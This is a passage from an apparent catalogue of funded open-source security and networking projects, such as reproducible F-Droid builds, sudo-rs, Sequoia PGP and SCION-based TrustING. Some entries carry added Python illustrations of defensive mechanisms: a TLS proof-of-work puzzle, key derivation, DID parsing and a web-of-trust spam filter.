Reproducible F-Droid — Building a trusted app ecosystem with F-Droid

F-Droid maintains a complete free software build/sign/deploy stack for securely making signed releases of Android apps in a fully automated way. This has been used since 2010 to run the f-droid.org repository of free software Android apps. Reproducible builds make it possible to establish a strong link between the actual app running on our devices and the source code it was built from. When the source code has been thoroughly inspected and is trusted, it is then possible to apply that same trust to the installed binary.

This project will make this stack much easier for other people and organizations to deploy and use on a daily basis. This allows organizations to run rebuilders to confirm that the releases available on f-droid.org or any F-Droid-compatible repository exactly match the source code. The resulting data can then be automatically consumed by the client app so it can communicate to the user that it was confirmed as a reproducible build.

>> Read more about Reproducible F-Droid

Robur private DNS resolver and DHCP server — Secure network configuration and DNS resolution

DHCP and DNS are fundamental Internet protocols: DHCP is used for dynamic IP address configuration in a local network, DNS for resolving hostnames to IP addresses. In this project, we develop a robust DHCP server and DNS resolver as a MirageOS unikernel. MirageOS unikernels are self-contained virtual machine images which are composed of the required OCaml libraries, leading to a binary with a minimal trusted code base, and thus a minimized attack surface. The choice of the memory-safe, functional, and statically typed language OCaml avoids common attack vectors, such as buffer overflows and double frees. MirageOS unikernels can be deployed on various hypervisors (Xen, KVM, BHyve), microkernels (Genode, Muen), or as a Unix binary (also with seccomp rules that allow only 10 system calls) on x86-64 and arm64. Several DHCP and DNS privacy extensions, extensive testing, and documentation are being worked on to allow everyone to use it on their home router or in the data center. Migration of existing configuration (e.g. dnsmasq) to the Robur DNS resolver and DHCP server will be provided as well.

>> Read more about Robur private DNS resolver and DHCP server

Rocket CWMP — Remote governance and configuration for internet equipment

CWMP (CPE WAN Management Protocol), also known as TR-069, is a Broadband Forum technical specification designed for the remote management of customer-premises equipment (CPE). CWMP is a standardized and widely used text-based protocol enabling communication between a CPE and an Auto Configuration Server (ACS).

Rocket CWMP is a modular CWMP client capable of supporting TR-069, TR-181 and other technical reports. The project was started to fill an industry gap: there was no production-ready FOSS solution that meets ISP requirements as well as the feature and security requirements of modern embedded devices. It is capable of integrating into existing solutions for automatic and remote software installation or provisioning of CPEs. The client is designed to be easily portable to different Linux platforms (OpenWrt and other Linux distributions such as Yocto, Debian, Ubuntu and others). Its modularity means that developers can easily build new features based on their requirements. It would serve as lightweight glue between CWMP and embedded Linux software standards for configuration and statistics.

The end goal of this project is to create a FOSS client delivering the mandatory remote management features in the ISP ecosystem. ISPs would finally be equipped with a CWMP client that: a) is an open and extendable replacement for the closed software alternatives, b) is designed to easily include and configure various backend systems and c) allows replacing proprietary firmware and leveraging Open Source components.

>> Read more about Rocket CWMP

SASL Works for the InternetWide Architecture — Integrate new authentication mechanisms into SASL

The SASL Works allow clients to use authentication mechanisms that meet their requirements, and use them in virtually all protocols, which includes but is not limited to the web. Servers, on the other hand, can flexibly adapt to clients from any domain, by backporting authentication inquiries to the client's own realm for the desired level of approval. Once configured, this process frees service providers from the need to manage user accounts and secure storage of credentials. Clients finally get a choice to use strong cryptographic authentication mechanisms instead of being forced to use a site programmer's poor approach to security. This in turn is helpful for setting higher levels of security policy in formal bodies such as organisations and governments, while generally simplifying the user interaction.

>> Read more about SASL Works for the InternetWide Architecture

Geographic tagging of Routing and Forwarding — Geographic tagging and discovery of Internet Routing and Forwarding

SCION is the first clean-slate Internet architecture designed to provide route control, failure isolation, and explicit trust information for end-to-end communication. As a path-based architecture, SCION end hosts learn about available network path segments and combine them into end-to-end paths, which are carried in packet headers. By design, SCION offers transparency to end hosts with respect to the path a packet travels through the network. This has numerous applications related to trust, compliance, and also privacy. By better understanding the geographic and legislative context of a path, users can for instance choose trustworthy paths that best protect their privacy, or avoid the need for privacy-intrusive and expensive CDNs by selecting resources closer to them. SCION is the first decentralised system to offer this kind of transparency and control to users of the network.

>> Read more about Geographic tagging of Routing and Forwarding

SCION-RAINS — RAINS, Another Internet Naming Service (or, a DNS alternative)

RAINS (which recursively stands for RAINS, Another Internet Naming Service) is an alternative name resolution protocol that has been designed with the aim to provide an ideal naming service for the SCION Internet architecture. SCION is one of the most ambitious and realistic alternative Internet architectures currently in play, and has interesting traits such as route control, failure isolation, multipath capabilities and explicit trust information for end-to-end communication.

The RAINS architecture is simple but effective: while it resembles the architecture of DNS, it also benefits from being a clean-slate design and provides security across all TLDs - where DNS with DNSSEC fails to provide such capabilities across the board. RAINS, unlike DNS, has no relative clocks: the DNS TTL is replaced by absolute validity timestamps on the signature. All records are signed.

>> Read more about SCION-RAINS

Subliminal Messaging — Embedded secure channels within traditional and internet telephony

Most of today's telephony consists of digital transmissions, so given a codec without mangling or added noise, it becomes possible to treat (part of) that as a data channel, and pass meaningful data through it while maintaining an acceptable noise floor for the sound being transmitted. That data channel can give rise to information exchange, including key material and alternative contact options.

The project will work on various improvements that connect telephony and digital communication: (1) VPN setup with telephony protocols, (2) data communication over the PSTN backbone and its extensions into VoIP, (3) digital security for PSTN and VoIP calls.

>> Read more about Subliminal Messaging

Secure Web Tokens for Linux — TPM 2.0 backed FIDO2/U2F tokens on Linux

This project aims to develop a systemd daemon that utilizes the TPM 2.0 security chip to provide FIDO2/U2F tokens for web browsers and operating system applications on Linux. Leveraging the ubiquitous presence of TPM2 in modern PCs, the daemon will enhance security and usability for Linux users. It will allow the integration of security chips as access tokens with web extensions, secure local passwords and HOTP/TOTP managers, and enable hardware-based lock screen authentication mechanisms.

The daemon will interface with the TPM2 chip to manage FIDO2 token generation. It includes support for the "uhid" kernel driver for button press emulation when no fingerprint reader is available for authentication. The project involves developing the daemon, ensuring seamless integration with systemd, and conducting extensive testing for functionality and security. Comprehensive documentation will be provided for setup and use, along with user guides for web extension integration. The outcome will be a robust, secure, and user-friendly solution for Linux users, elevating the baseline security and leveraging existing hardware capabilities to the fullest.

>> Read more about Secure Web Tokens for Linux

SeedVault Integrity — Add integrity checking and WebDAV support to SeedVault Android backups

SeedVault Backup is an independent open-source app data backup application for Android and derived mobile operating systems. By storing Android users' data and files in a place the user chooses, and by using client-side encryption to protect backed-up data, SeedVault offers users maximum data privacy and resilience with minimal hassle.

SeedVault uses Android's storage access framework (SAF) to read and write encrypted app data. This allows it to back up and restore application data on a wide range of platforms (such as Nextcloud) and even USB flash drives.

The project will improve the current implementation to allow storing files also on generic WebDAV-based storage without the SAF abstraction layer for improved performance and reliability. It will be possible to decide what apps and files should be restored and to verify the integrity of the backups made.

>> Read more about SeedVault Integrity

SelfPrivacy — Reproducible self-hosting stack based on NixOS

Self-hosting can be a challenge even for a professional, let alone an unprepared user. We want to change that. SelfPrivacy is a free application that helps you set up and manage your self-hosted services. Our goal is to create an accessible tool that gives everyone an opportunity to create their own self-hosted infrastructure.

Our application supports multiple platforms and to use it, all you need is to register with a provider and copy the access token into the application. SelfPrivacy will set up the system, domain, DNS and install open source services such as E-Mail, Nextcloud, Jitsi, etc. SelfPrivacy automates the entire lifecycle: provisioning, updates, configuration changes, monitoring, backups and space management.

We encourage the use of private services that we provide, and we also develop infrastructure based on the NixOS distribution.

>> Read more about SelfPrivacy

A Secret Key Store for Sequoia PGP — Standards-compliant private key store for OpenPGP

This project implements a private key store for Sequoia, a new OpenPGP implementation. Currently, Sequoia-using programs use private keys directly. A private key store mediates applications' access to private keys, and offers three major advantages relative to the status quo. First, a private key store is in a separate address space. This means that private keys that are in memory are in a different address space from the application. The absence of such separation was the underlying cause of the Heartbleed vulnerability. Second, a private key store can provide a uniform interface for accessing keys stored on different backends, e.g., an in-memory key, a key on a smart card, or a key on a remote computer, which is accessed via ssh. This simplifies applications. Third, this architecture simplifies sharing private key material among multiple applications. Only the private key store needs to worry about managing the private key material, which improves security. And, when a user unlocks a key in one application, it is potentially unlocked in all applications, which improves usability.

>> Read more about A Secret Key Store for Sequoia PGP

Adding TPM Support to Sequoia PGP — Implement use of TPM 2.0 crypto hardware for OpenPGP

Protecting cryptographic keys is hard. If they are stored in a file, an attacker can exfiltrate them - even if the hard drive is encrypted at rest. A good practical solution is a hardware token like a Nitrokey, which stores keys and exposes a limited API to the host. For most end users, a token is a hassle: one needs to carry it around, it needs to be inserted, and it is not possible to work if it is left at home. And, it needs to be purchased. There is a better solution, which doesn't cost anything. A Trusted Platform Module (TPM) is like an always-connected hardware token, only more powerful (the keys can be bound to a particular OS installation, and it can store a nearly unlimited number of keys, not just three), and TPMs are already present in most computers. This project will add support for TPMs to Sequoia PGP, including comprehensive test suites and in-depth documentation for both software engineers (as an API) and end users (as a way to use TPM-bound keys through Sequoia's command-line interface, sq, for decryption and signing).

>> Read more about Adding TPM Support to Sequoia PGP

SignRoom — Zenroom based signature and credential platform

Leveraging the quantum-proof cryptographic implementation done in Zenroom (along with Zenroom's other cryptographic flows) we are developing a simple to use web-based platform, allowing users to sign and verify messages and documents (PDF, Office files, pictures etc) using quantum-proof, ECDSA and Schnorr signatures as well as multi-signatures. Document signatures are stored inside the document using the PAdES and XAdES standards. The tool will also produce and verify zero-knowledge proof credentials and W3C-VC credentials for signature and verification. The platform is built as a PWA, is mobile friendly, and has APIs for third-party integration, a library to integrate into mobile applications, and bindings for multiple programming languages.

>> Read more about SignRoom

Solid Application Interoperability

The Solid Application Interoperability specification details how Agents in the Solid ecosystem can read, write, and manage data stored in a Solid Pod using disparate Applications, either individually or in collaboration with other Agents. Solid is a specification that lets people store their data securely in decentralized data stores called Pods. Pods are like secure personal web servers for data. When data is stored in someone's Pod, they control which people and applications can access it. Solid was initiated and is currently led by the inventor of the World Wide Web, Sir Tim Berners-Lee. Solid Application Interoperability provides a clear way to create intuitive data boundaries and higher-level patterns to manage access to that data following the principle of least privilege. The specification is accompanied by a primer and sample implementations.

>> Read more about Solid Application Interoperability

Solid Application Interoperability — Interoperable Data sharing flows and discovery for Solid

The Solid Application Interoperability specification details how Agents in the Solid ecosystem can read, write, and manage data stored in a Solid Pod using disparate Applications, either individually or in collaboration with other Agents. Solid is a specification that lets people store their data securely in decentralized data stores called Pods. Pods are like secure personal web servers for data. When data is stored in someone's Pod, they control which people and applications can access it. Solid Application Interoperability provides a clear way to create intuitive data boundaries and higher-level patterns to manage access to that data following the principle of least privilege.

The focus of this project is on three parts: i18n for the Authorization Agent, data sharing flows and verifying WebID of social peers.

>> Read more about Solid Application Interoperability

Solid Wallet — Authorization reasoning, rule-based controls and fluid integration for Solid

Solid Apps display information collected by following linked data across the World Wide Web, writing changes to Solid Personal Online Data Stores (Pods). Following links can land an App on a protected resource somewhere on the Web, accessible only to a select group of actors specified in an associated Web Access Control resource. Solid Wallet aims to build core libraries to reason over Solid Access Control rules, limit access to what clients can request, publish keys and sign transactions. The same libraries will also be usable by servers to verify such claims. Finally, we will use these libraries to build a flexible prototype Wallet for Solid apps that run in the browser or on a server.

>> Read more about Solid Wallet

Dual-level Specification Inference — Make formal verification more practical with dual-level Specification Inference

While formal verification of smart contracts gains traction, writing formal specifications can be as costly as, if not more costly than, writing the code itself. Spec^2 is a specification inference framework that aims to automatically deduce a high-quality set of specs from the code alone. The inferred specs include both per-transaction pre- and post-conditions (low-level specs) and invariants on the blockchain-backed storage (high-level specs). Furthermore, the inferred specs should be similar to what experts might develop manually and can be easily examined by people without formal verification training. The funding from NLnet and NGI Assure will be used to prototype Spec^2 against the Move language and infer specifications for Move-based smart contracts.

>> Read more about Dual-level Specification Inference

Statime PTP Master — Statime - Zero-allocation cross-platform Precision Time Protocol

High-precision clock synchronization is becoming increasingly important in application areas such as high-precision localization, finance, broadcasting, security protocols, smart grids, and cellular base station transmissions. The Precision Time Protocol (PTP) is widely used for these critical applications and it is therefore important for it to be as secure and reliable as possible.

We have previously developed the first iteration of Statime, an implementation of a PTP slave in the Rust programming language. The outcome of that project is a secure-by-design implementation, leveraging Rust's ownership rules and borrow checker to guarantee memory safety (outside explicitly unsafe blocks). With this project, we will expand our implementation in two ways. Firstly, we will expand the feature set to include a PTP master conforming to the IEEE standard for PTP (the 2019 version, IEEE 1588-2019), so we can run a full PTP instance with the memory-safety guarantees that our implementation provides.

Secondly, our implementation will be able to run without an operating system or system allocator. Those properties make the implementation inherently portable and more reliable. Our concrete goal for this second phase is that it runs on the STM32F7 microcontroller, a device with built-in PTP Ethernet support but otherwise limited capabilities.

>> Read more about Statime PTP Master

Maintenance and portability of sudo-rs — Make sudo-rs available cross-platform

The sudo and su utilities guard a critical privilege boundary on just about every free and open-source operating system that powers the Internet. Memory safety bugs occur in the original sudo from time to time, and there is only one maintainer to fix them. For these reasons sudo-rs was written: a Rust drop-in replacement for sudo on Linux. For it to be a success, it needs to gain adoption. In this project, we will 1) address bugs and incompatibilities between sudo-rs and sudo and 2) port it to platforms other than Linux, to grow its user base and viability.

>> Read more about Maintenance and portability of sudo-rs

Software Heritage listers + tooling — Performance improvements and new listers/tooling for Software Heritage

Software Heritage's ambition is to collect, preserve, and share all software that is publicly available in source code form. The platform currently lists and loads more than 200 million free and open source projects. One of the bottlenecks for collecting sources is the speed at which these can be collected. We want to address performance improvements on data discovery and ingestion through the usage of the PyPy interpreter, which should help reduce CPU-bound time in the highly repetitive areas of the Python code responsible for data analysis and validation. To expand the list of existing source code origins we will create new listers and loaders for the Dlang, Julia and Elm package managers.

>> Read more about Software Heritage listers + tooling

Threadiverse Reproducible Deployment — Reproducible deployment for Threadiverse servers

The Fediverse is more than short-form microblogging. The ActivityPub protocol connects all kinds of software for various communication needs. Some of those are concentrated on long blogs and threaded discussion forums. A common understanding of conversations in ActivityPub and their secure and safe-from-spam implementation is being developed in several fediverse projects. This project focuses on stable and documented automated deployment for two of them - Hubzilla and Streams - including interoperability tests. This will support threadiverse standardization efforts, and help to bring features like group photo albums and full channel portability between instances.

>> Read more about Threadiverse Reproducible Deployment

Client Proof-of-Work in TLS — Mitigation against DoS amplification on the TLS handshake

The computationally expensive asymmetric cryptography in the TLS handshake makes servers vulnerable to denial-of-service attacks: a client can trigger the server's expensive key-exchange and signing operations at very little cost to itself. We propose an extension to TLS that mitigates this attack vector by requiring the client to spend effort before the server does, shifting the advantage from the attacker to the defender. The project will deliver a draft spec, mergeable patches for leading TLS libraries, and a measurement report explaining the results.
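To make the cost shift concrete, here is a generic hash-based client puzzle of the kind the paragraph describes. This is an added example, not the project's draft specification or its library patches: the message layout, the HMAC-bound stateless challenge, the SHA-256 leading-zero-bits criterion and the 64-bit counter are assumptions chosen for illustration. The point it shows is the asymmetry: the client performs roughly 2^difficulty hashes, while the server verifies with one HMAC and one hash and only then commits to its expensive asymmetric work.

```python
import hashlib
import hmac
import os
import struct

# Per-server secret so a challenge can be recomputed instead of stored (assumed design).
SERVER_SECRET = os.urandom(32)


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a digest."""
    value = int.from_bytes(digest, "big")
    return len(digest) * 8 - value.bit_length()


def hash_hello(client_hello: bytes) -> bytes:
    """The puzzle is bound to a hash of the client's first message."""
    return hashlib.sha256(client_hello).digest()


def issue_challenge(client_hello_hash: bytes, difficulty: int) -> bytes:
    """Server side. The challenge is an HMAC over the client's hello and the
    difficulty, so the server keeps no per-client state and a solution found for
    one hello is useless for another."""
    msg = client_hello_hash + bytes([difficulty])
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()


def solve(challenge: bytes, difficulty: int) -> tuple:
    """Client side. Search a 64-bit counter until SHA-256(challenge || counter)
    has at least `difficulty` leading zero bits. Returns (counter, hashes_done);
    the expected cost is about 2**difficulty hashes."""
    counter = 0
    while True:
        digest = hashlib.sha256(challenge + struct.pack(">Q", counter)).digest()
        if leading_zero_bits(digest) >= difficulty:
            return counter, counter + 1
        counter += 1


def verify(client_hello_hash: bytes, difficulty: int, counter: int) -> bool:
    """Server side. One HMAC plus one SHA-256 whatever the difficulty; this is
    the asymmetry that moves the cost onto the client."""
    challenge = issue_challenge(client_hello_hash, difficulty)
    digest = hashlib.sha256(challenge + struct.pack(">Q", counter)).digest()
    return leading_zero_bits(digest) >= difficulty


def simulate_handshake(client_hello: bytes, difficulty: int) -> dict:
    """Round trip: the server answers the first hello with a puzzle and performs
    its expensive asymmetric work only after a valid solution arrives."""
    hello_hash = hash_hello(client_hello)
    challenge = issue_challenge(hello_hash, difficulty)    # server -> client
    counter, client_hashes = solve(challenge, difficulty)  # client burns CPU
    accepted = verify(hello_hash, difficulty, counter)     # server: cheap check
    return {"accepted": accepted, "client_hashes": client_hashes, "server_hashes": 2}


if __name__ == "__main__":
    # constructed input; difficulty 16 costs the client ~65k hashes, the server 2
    print(simulate_handshake(b"constructed ClientHello bytes", difficulty=16))
```

Two practitioner notes on this construction: binding the challenge to the hello (and keying it with a server secret) stops an attacker from precomputing or replaying solutions, and keeping the server stateless avoids turning the puzzle itself into a memory-exhaustion vector. The difficulty would in practice be raised dynamically under load rather than fixed.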

>> Read more about Client Proof-of-Work in TLS

TrustING — Ultrafast AS-level Public-Key Infrastructure

TrustING is a human-transparent and agile Trust Infrastructure for a Next-Generation Internet. This infrastructure enables any two entities to establish secret keys that can be used to encrypt and authenticate data. The foundation of TrustING is the AS-level Public-Key Infrastructure (PKI) of the SCION Internet Architecture that provides sovereignty (ensuring absence of global kill switches), trust transparency, and algorithm agility, among others.

The TrustING service establishes symmetric keys with other domains in advance, and then relies on those keys to derive keys for local hosts. The core novelty of this approach is the ability to derive keys purely locally on both sides of the communication, without even requiring key transport. By making TrustING a control-plane mechanism offered by the network infrastructure, higher-level applications can make use of it without having to worry about complexities such as exchanging key material or establishing trust.

To show the viability of TrustING, we will implement TLS trust bootstrapping using TrustING and additionally demonstrate the efficiency of TrustING by using it to authenticate SCMP (SCION's equivalent of ICMP) messages.
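The two-level derivation described above (inter-domain symmetric keys agreed in advance, per-host keys derived locally on both sides) can be sketched in a few lines. This is an added example and not TrustING or SCION code: the PRF (HMAC-SHA256), the label format, the epoch field, the truncated MAC and the "SCMP-like" message are all assumptions made for illustration. What it demonstrates is that once domains A and B share K_AB, a host in A and a host in B end up with the same key without that key ever being transported, while a third domain C that shares keys with both A and B individually still cannot produce it.

```python
import hashlib
import hmac
import os


def prf(key: bytes, label: bytes) -> bytes:
    """Key derivation function; HMAC-SHA256 is an assumption, not TrustING's PRF."""
    return hmac.new(key, label, hashlib.sha256).digest()


def key_label(src: str, src_host: str, dst: str, dst_host: str, epoch: int) -> bytes:
    """Label binding a host-level key to its direction, endpoints and epoch (assumed format)."""
    return f"{epoch}|{src}|{src_host}|{dst}|{dst_host}".encode()


class Domain:
    """One autonomous system. `peer_keys` holds the symmetric keys agreed with other
    domains ahead of time (the control-plane step); host_key is purely local."""

    def __init__(self, name: str):
        self.name = name
        self.peer_keys = {}

    def host_key(self, src: str, src_host: str, dst: str, dst_host: str, epoch: int) -> bytes:
        """Key for traffic from src_host@src to dst_host@dst. Both endpoint domains
        compute the same value from K_{src,dst}; nothing is sent over the network."""
        if self.name not in (src, dst) or src == dst:
            raise ValueError(f"{self.name} is not an endpoint domain of this key")
        peer = dst if src == self.name else src
        return prf(self.peer_keys[peer], key_label(src, src_host, dst, dst_host, epoch))


def pair_domains(a: Domain, b: Domain) -> None:
    """Stand-in for the in-advance key establishment (over the AS-level PKI in
    TrustING); here a random key is simply installed on both sides."""
    key = os.urandom(32)
    a.peer_keys[b.name] = key
    b.peer_keys[a.name] = key


def authenticate(key: bytes, message: bytes) -> bytes:
    """Tag such as one could attach to an SCMP-like control message (truncation assumed)."""
    return hmac.new(key, message, hashlib.sha256).digest()[:16]


def check(key: bytes, message: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(authenticate(key, message), tag)


def demo() -> dict:
    a, b, c = Domain("A"), Domain("B"), Domain("C")
    pair_domains(a, b)
    pair_domains(b, c)
    pair_domains(a, c)
    epoch = 7  # inter-domain keys would be rotated per epoch (assumed)
    msg = b"constructed SCMP-like payload: destination unreachable"
    # host h1 in A authenticates a message to host h2 in B
    k_sender = a.host_key("A", "h1", "B", "h2", epoch)
    tag = authenticate(k_sender, msg)
    # B derives the same key locally; no key travelled with the message
    k_receiver = b.host_key("A", "h1", "B", "h2", epoch)
    # C knows K_AC and K_BC but not K_AB, so its best attempt uses the wrong base key
    forged_tag = authenticate(prf(c.peer_keys["B"], key_label("A", "h1", "B", "h2", epoch)), msg)
    return {
        "same_key": k_sender == k_receiver,
        "accepted": check(k_receiver, msg, tag),
        "forgery_accepted": check(k_receiver, msg, forged_tag),
        "epoch_rotates": a.host_key("A", "h1", "B", "h2", epoch + 1) != k_sender,
    }


if __name__ == "__main__":
    print(demo())
```

The property worth checking in any such scheme is the one the last two dictionary entries test: a domain that is not an endpoint of the inter-domain key must not be able to derive the host key, and a new epoch must yield a fresh key so that a leaked host key has a bounded lifetime.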

>> Read more about TrustING

Trust semantic learning and monitoring — Measure on-going trust between interacting agents

Trust semantic learning and monitoring is part of a wide ranging effort to understand trust in network socio-technical systems. The expected outcome of this part is a methodology and proof of concept code library for qualifying and quantifying trust between agents in a network. In IT, trust is often treated as a binary "crypto token", based on some validation test, and developers naively speak of zero trust systems without understanding the depth of what trust really is. But, trust is a deeply social phenomenon, which changes in real time based on social and technical interactions. By applying learning algorithms and data analytics to streamed interactions, this project attempts to qualify and quantify a measure of trust as a way of making realtime risk estimates.

>> Read more about Trust semantic learning and monitoring

Tvix — Alternative Rust-based software build transparency

Tvix is a modern design and implementation of the Nix package manager (GPLv3). It brings a modular architecture in which components such as the build environment or package store are replaceable, which enables new use-cases and platforms. A graph-reduction evaluation model will make it possible to use Nix for package definitions and entire system configurations, its proven and tested use case, as well as for granular build definitions for individual components of software. Tvix will be fully compatible with nixpkgs, the existing package definition set for Nix, letting its users leverage more than a decade of community contributions and making it useful right out-of-the-box.

>> Read more about Tvix

Universal DID Resolver and Registrar — Tooling for decentralized identifiers

The Universal DID Resolver and Registrar are open-source software components that implement Decentralized Identifiers (DIDs). DIDs lie at the heart of an emerging technical and social paradigm known as "self-sovereign identity" (SSI), which allows individuals, organizations, and things to create and manage their digital identities without dependence on any central authority or intermediary. This technology is highly aligned with Next Generation Internet values such as human-centricity, openness, trust, and reliability. DIDs as a building block for protocols are of similar importance to Internet infrastructure as other identifiers such as domain names or e-mail addresses. The Universal DID Resolver and Registrar are aligned with corresponding W3C community group specification efforts. Development and maintenance of the code takes place in close collaboration with relevant community and industry stakeholders such as the Decentralized Identity Foundation, uPort, Jolocom, Sovrin, Civic, Veres One, Blockstack, ERC725 Alliance, etc.
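What a "universal" resolver does at its front door is mechanical but security-relevant: validate that the input really is a DID according to the W3C DID Core grammar, split off the method name, and only then hand the identifier to that method's driver, so that nothing but a well-formed lowercase method name ever reaches driver lookup. The following is an added illustration of that front door, not the Universal Resolver's code; the in-memory "example" driver, its DID document and the (deliberately fake) key value are constructed here.

```python
import re
from typing import Optional

# One method-specific-id character: ALPHA / DIGIT / "." / "-" / "_" / pct-encoded
_IDCHAR = r"(?:[A-Za-z0-9._-]|%[0-9A-Fa-f]{2})"
# did = "did:" method-name ":" method-specific-id
# method-name = 1*(lowercase letter / digit)
# method-specific-id = *( *idchar ":" ) 1*idchar   (colons allowed inside, not at the end)
# DID URL = did [path] ["?" query] ["#" fragment]
_DID_URL_RE = re.compile(
    rf"^(?P<did>did:(?P<method>[a-z0-9]+):(?P<id>(?:{_IDCHAR}*:)*{_IDCHAR}+))"
    r"(?P<path>/[^?#]*)?(?:\?(?P<query>[^#]*))?(?:#(?P<fragment>.*))?$"
)


def parse_did_url(did_url: str) -> Optional[dict]:
    """Components of a DID URL, or None if it is not syntactically a DID URL."""
    m = _DID_URL_RE.match(did_url)
    return m.groupdict() if m else None


# --- constructed stand-in for a per-method driver (the real ones talk to a ledger, web host, etc.)
_EXAMPLE_LEDGER = {
    "did:example:123456789abcdefghi": {
        "@context": "https://www.w3.org/ns/did/v1",
        "id": "did:example:123456789abcdefghi",
        "verificationMethod": [{
            "id": "did:example:123456789abcdefghi#keys-1",
            "type": "Ed25519VerificationKey2020",
            "controller": "did:example:123456789abcdefghi",
            "publicKeyMultibase": "zCONSTRUCTEDnotARealKey",  # placeholder, not a real key
        }],
        "authentication": ["did:example:123456789abcdefghi#keys-1"],
    }
}


def _example_driver(did: str) -> Optional[dict]:
    return _EXAMPLE_LEDGER.get(did)


DRIVERS = {"example": _example_driver}


def resolve(did: str) -> dict:
    """Validate syntax, dispatch to the method driver, return a resolution result
    (key and error names follow the W3C DID Core / DID Resolution specs)."""
    parts = parse_did_url(did)
    if parts is None or parts["path"] or parts["query"] or parts["fragment"] is not None:
        return {"didResolutionMetadata": {"error": "invalidDid"}, "didDocument": None}
    driver = DRIVERS.get(parts["method"])  # only a validated [a-z0-9]+ name gets here
    if driver is None:
        return {"didResolutionMetadata": {"error": "methodNotSupported"}, "didDocument": None}
    doc = driver(parts["did"])
    if doc is None:
        return {"didResolutionMetadata": {"error": "notFound"}, "didDocument": None}
    return {"didResolutionMetadata": {"contentType": "application/did+json"}, "didDocument": doc}


def dereference(did_url: str) -> Optional[dict]:
    """Resolve the DID, then select the verification method named by the fragment."""
    parts = parse_did_url(did_url)
    if parts is None:
        return None
    doc = resolve(parts["did"])["didDocument"]
    if doc is None or parts["fragment"] is None:
        return doc
    target = f"{parts['did']}#{parts['fragment']}"
    return next((vm for vm in doc.get("verificationMethod", []) if vm["id"] == target), None)


if __name__ == "__main__":
    print(parse_did_url("did:web:example.com:user:alice/profile?v=1#key-1"))
    print(dereference("did:example:123456789abcdefghi#keys-1"))
```

Rejecting `did:Example:123` (uppercase method) and `did:example:123:` (trailing colon) up front matters when the resolver builds a driver address or a ledger query from the method name and identifier: a driver that receives only grammar-conformant input has one less class of injection to defend against.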

>> Read more about Universal DID Resolver and Registrar

XWiki — Bring wiki capabilities into the Fediverse

XWiki is a modern and extensible open source wiki platform. Up until now, XWiki had been focusing on providing the best collaboration experience and features to its users. We're now taking this to the next level by having XWiki be part of the larger federation of collaboration and social software (a.k.a. fediverse), thus allowing users to collaborate externally. XWiki is embracing the W3C ActivityPub specification. Specifically we're implementing the server part of the specification, to be able to both view activity and content happening in external services inside XWiki itself and to make XWiki's activity and content available from these other services too. A specific but crucial use case, is to allow content collaboration between different XWiki servers, sharing content and activity.

>> Read more about XWiki

Wispwot — Implement generalized scalable protection against disruptive behavior in content discovery

Spam and intentional disruption are a major problem on the clearnet. They make it infeasible to have comments on websites without moderation teams, privacy-invading humanity checks, and access restrictions, and they force social networks to choose between invasive censorship and exposing their community to abuse, propaganda and targeted harassment. The core of the problem is that spam scales better than spam-blocking.

This project brings the spam defense from the Hyphanet Project to the fediverse. It replaces instant global visibility with incremental local visibility, fueled by positive social interaction and transitive blocking, so spammers quickly become invisible to most. To scale to groups of arbitrary size, it extends the system from Hyphanet by adding pruning of inactive accounts and efficient rediscovery. With this project, spam protection scales better than spamming, reducing the work needed to cope with hostile communication, so group communication won’t require the outsourced, underpaid moderation teams that are prevalent in most centralized social networks.
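The mechanism in the paragraph (visibility computed locally from a viewer's own trust and that of its peers, with blocks propagating transitively and inactive accounts pruned) is easier to reason about with a small model. The code below is an added, simplified illustration and not Wispwot's or Hyphanet's implementation: the trust range, the capacity weights by distance, the rule that only closer and positively scored identities get a vote, the visibility threshold and the pruning window are all assumed values. It shows a spammer endorsed by one distant peer but blocked by a close one becoming invisible, a sockpuppet the spammer vouches for gaining nothing, a newcomer becoming visible after one positive interaction, and a silent account being pruned along with its endorsements.

```python
from collections import deque
from typing import Dict, Set

# Weight (percent) of a truster's opinion by its distance from the viewer
# (assumed values: close peers dominate distant ones).
CAPACITY = {0: 100, 1: 40, 2: 16, 3: 6, 4: 2}
FAR_CAPACITY = 1


class WebOfTrust:
    def __init__(self) -> None:
        self.trust: Dict[str, Dict[str, int]] = {}  # truster -> trustee -> value in [-100, 100]
        self.last_active: Dict[str, int] = {}

    def seen(self, identity: str, now: int) -> None:
        self.last_active[identity] = now

    def set_trust(self, truster: str, trustee: str, value: int, now: int) -> None:
        if not -100 <= value <= 100:
            raise ValueError("trust must be in [-100, 100]")
        self.trust.setdefault(truster, {})[trustee] = value
        self.seen(truster, now)

    def _active(self, now: int, window: int) -> Set[str]:
        """Pruning: identities silent for longer than `window` drop out of the graph."""
        return {i for i, t in self.last_active.items() if now - t <= window}

    def scores(self, viewer: str, now: int, window: int) -> Dict[str, int]:
        active = self._active(now, window)
        # 1. rank = distance from the viewer along positive trust edges (incremental
        #    local visibility: anything unreachable this way is simply unknown)
        rank = {viewer: 0}
        queue = deque([viewer])
        while queue:
            t = queue.popleft()
            for trustee, v in self.trust.get(t, {}).items():
                if v > 0 and trustee in active and trustee not in rank:
                    rank[trustee] = rank[t] + 1
                    queue.append(trustee)
        # 2. score = weighted sum of opinions from closer trusters with a positive
        #    score; a blocked identity therefore cannot vouch for anyone (transitive blocking)
        score = {viewer: 100}
        for identity in sorted(rank, key=rank.get):
            if identity == viewer:
                continue
            total = 0
            for truster in rank:
                if rank[truster] >= rank[identity] or score.get(truster, 0) <= 0:
                    continue
                value = self.trust.get(truster, {}).get(identity)
                if value is not None:
                    total += value * CAPACITY.get(rank[truster], FAR_CAPACITY) // 100
            score[identity] = total
        return score

    def visible(self, viewer: str, now: int, window: int) -> Set[str]:
        return {i for i, s in self.scores(viewer, now, window).items() if s > 0 and i != viewer}


def scenario() -> dict:
    """Constructed graph: alice is the viewer; window of 30 time units."""
    w, now, window = WebOfTrust(), 100, 30
    w.set_trust("alice", "bob", 80, now)
    w.set_trust("bob", "carol", 60, now)
    w.set_trust("carol", "spammer", 100, now)     # one naive endorsement from afar...
    w.set_trust("bob", "spammer", -100, now)      # ...but a close peer blocked it
    w.set_trust("spammer", "sockpuppet", 100, now)
    w.set_trust("bob", "eve", 70, now)
    w.set_trust("eve", "frank", 100, 10)          # eve last active at t=10: pruned
    for i in ("sockpuppet", "frank", "dave"):
        w.seen(i, now)
    before = w.visible("alice", now, window)
    w.set_trust("carol", "dave", 50, now)         # one positive interaction makes dave visible
    return {"before": before, "after": w.visible("alice", now, window),
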